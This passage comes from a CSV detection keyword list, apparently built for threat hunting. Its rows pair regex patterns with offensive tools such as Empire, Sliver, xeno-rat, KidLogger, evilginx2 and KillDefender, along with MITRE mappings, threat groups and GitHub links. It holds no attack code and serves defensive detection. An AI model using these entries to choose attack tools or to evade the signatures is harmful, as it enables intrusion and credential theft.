- T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*KeyLoggerOffline.dll*",".{0,1000}KeyLoggerOffline\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*keylogrecorder.rb*",".{0,1000}keylogrecorder\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*keylooger.ps1*",".{0,1000}keylooger\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*keyring2john.py*",".{0,1000}keyring2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*keyscan dump*",".{0,1000}keyscan\sdump.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*keyscan start*",".{0,1000}keyscan\sstart.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*keyscan stop*",".{0,1000}keyscan\sstop.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*keystore2john.py*",".{0,1000}keystore2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*KeyTabExtract*",".{0,1000}KeyTabExtract.{0,1000}","offensive_tool_keyword","KeyTabExtract","KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. Encryption Type and NTLM Hash","T1003 - T1552.004 - T1110 - T1210","TA0006 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/sosdave/KeyTabExtract","1","0","N/A","N/A","2","179","41","2020-08-26T01:03:37Z","2019-03-18T15:00:14Z" "*keyword_obfuscation*",".{0,1000}keyword_obfuscation.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*kgretzky*",".{0,1000}kgretzky.{0,1000}","offensive_tool_keyword","Github Username","username Kuba Gretzky hosting sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*kgretzky/evilginx2*",".{0,1000}kgretzky\/evilginx2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*kgretzky/evilqr*",".{0,1000}kgretzky\/evilqr.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*kgretzky/pwndrop*",".{0,1000}kgretzky\/pwndrop.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1884","253","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*kh4sh3i/Spring-CVE*",".{0,1000}kh4sh3i\/Spring\-CVE.{0,1000}","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","14","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" "*khast3x*",".{0,1000}khast3x.{0,1000}","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/khast3x","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*khast3x/h8mail*",".{0,1000}khast3x\/h8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","8","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" "*Kicking off download cradle in a new process*",".{0,1000}Kicking\soff\sdownload\scradle\sin\sa\snew\sprocess.{0,1000}","offensive_tool_keyword","empire","empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*kick-operator -n *",".{0,1000}kick\-operator\s\-n\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*KidLogger-*.dmg*",".{0,1000}KidLogger\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kidlogger.conf*",".{0,1000}kidlogger\.conf.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Kidlogger.exe*",".{0,1000}Kidlogger\.exe.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*KidLogger.lnk*",".{0,1000}KidLogger\.lnk.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*KidLogger.net*",".{0,1000}KidLogger\.net.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*KidLogger.pif*",".{0,1000}KidLogger\.pif.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*KidLogger.url*",".{0,1000}KidLogger\.url.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*kidlogger_install*",".{0,1000}kidlogger_install.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*kidlogger_user.exe*",".{0,1000}kidlogger_user\.exe.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*killAllNimplants*",".{0,1000}killAllNimplants.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*killdefender check*",".{0,1000}killdefender\scheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","55","14","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*killdefender kill*",".{0,1000}killdefender\skill.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","55","14","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*KillDefender.h*",".{0,1000}KillDefender\.h.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*KillDefender.x64*",".{0,1000}KillDefender\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*KillDefender.x64.*",".{0,1000}KillDefender\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","10","10","55","14","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*killdefender_bof*",".{0,1000}killdefender_bof.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*KillDefender_BOF*",".{0,1000}KillDefender_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","10","10","55","14","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" "*KillDefenderBOF-main*",".{0,1000}KillDefenderBOF\-main.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*Killed running eventvwr*",".{0,1000}Killed\srunning\seventvwr.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-EventVwrBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Killed running sdclt*",".{0,1000}Killed\srunning\ssdclt.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Killer tool for EDR/AV Evasion --> IAT Obfuscation*",".{0,1000}Killer\stool\sfor\sEDR\/AV\sEvasion\s\-\-\>\sIAT\sObfuscation.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*kill-implant*",".{0,1000}kill\-implant.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Killing ngrok tunnel*",".{0,1000}Killing\sngrok\stunnel.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","#stringcontent","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*killprocess.py*",".{0,1000}killprocess\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*kimi_MDPC/kimi.py*",".{0,1000}kimi_MDPC\/kimi\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*KINGSABRI/ServerlessRedirector*",".{0,1000}KINGSABRI\/ServerlessRedirector.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense 